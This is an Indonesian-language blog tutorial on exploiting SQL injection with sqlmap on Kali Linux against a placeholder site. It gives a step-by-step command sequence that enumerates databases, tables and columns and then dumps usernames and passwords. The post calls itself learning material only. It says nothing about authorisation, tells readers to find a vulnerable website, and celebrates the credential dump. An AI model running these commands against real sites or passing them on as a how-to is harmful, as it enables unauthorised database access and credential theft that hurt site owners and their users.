Cara exploit Sql Injection dengan Sqlmap di kali linux

asalamualaikum

pada kesempatan kali ini saya mau share tutorial SQL injection dengan Sqlmap di kali linux

apa itu sqlmap?
SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database

tools terbaik untuk mengeksploit bug sql injection ketimbang tools2 sql lainnya

oh ya tutorial kali ini hanya pembelajaran semata

ok saya akan share lengkap dengan gambarnya

siapkan website yang vuln sql injection

lalu buka terminal baru dan ketik perintah

sqlmap -u http://target.com/index.php?id=50 --dbs lalu enter

lihat SS dibawah ini

 

biarkan tools berjalan jika ada pemberitahuan atau apalah ketik aja y lalu enter lagi

 

tunggu hingga selesai sampai muncul nama database website target

jika sudah muncul nama database tersebut sekarang ke step selanjutnya
ketik perintah

sqlmap -u http://target.com/index.php?id=50 -D namadatabase --tables
lalu enter

lihat SS dibawah kali ini nama database target saya yaitu public

setelah itu kita tunggu lagi sampai sqlmap membuka semua tables dari database tersebut

jika sudah muncul semua table dari database target selanjutnya kita buka colum table database target ketik perintah

sqlmap -u http://target.com/index.php?id=50 -D namadatabase -T namatable --column

terus akan muncul deh semua colum dari table nya

nah jika sudah muncul semua columnya sekarang kita dump apa yang mau kita dump kali ini saya akan dump username dan password jadi ketik perintah

sqlmap -u http://target.com/index.php?id=50 -D namadatabase -T namacolum -C password,username --dump

lalu enter

tunggu sejenak dan taraaaa username dan password muncul tuh hehehe

sudah jelas kan ??

hehehehe ok deh itu tutorial sql injection dengan sqlmap di kali linux
semoga bermamfaat

jika kurang jelas silahkan komentar

terima kasih kunjungannya :D